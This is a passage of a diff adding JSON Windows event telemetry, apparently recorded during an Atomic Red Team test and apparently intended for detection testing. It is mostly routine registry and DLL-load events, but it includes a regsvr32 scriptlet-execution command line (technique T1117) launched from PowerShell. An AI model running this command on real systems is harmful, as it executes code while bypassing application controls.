"CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters\\TrapPollTimeMilliSecs", + "registry_value": "TrapPollTimeMilliSecs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "inetmib1.dll", + "image_path": "C:\\Windows\\System32\\inetmib1.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "subtype": "terminate", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "file", + "file_name": "ARP.EXE-6A72334A.pf", + "file_path": "C:\\Windows\\Prefetch\\ARP.EXE-6A72334A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573233240000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4768, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573233400000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4768, + 
"process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "event_type": "process", + "pid": 4768, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573233390000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7980, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573235480000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235420000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "command_line": "regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3596, + "ppid": 7980, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573235570000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573235580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573235580000, + 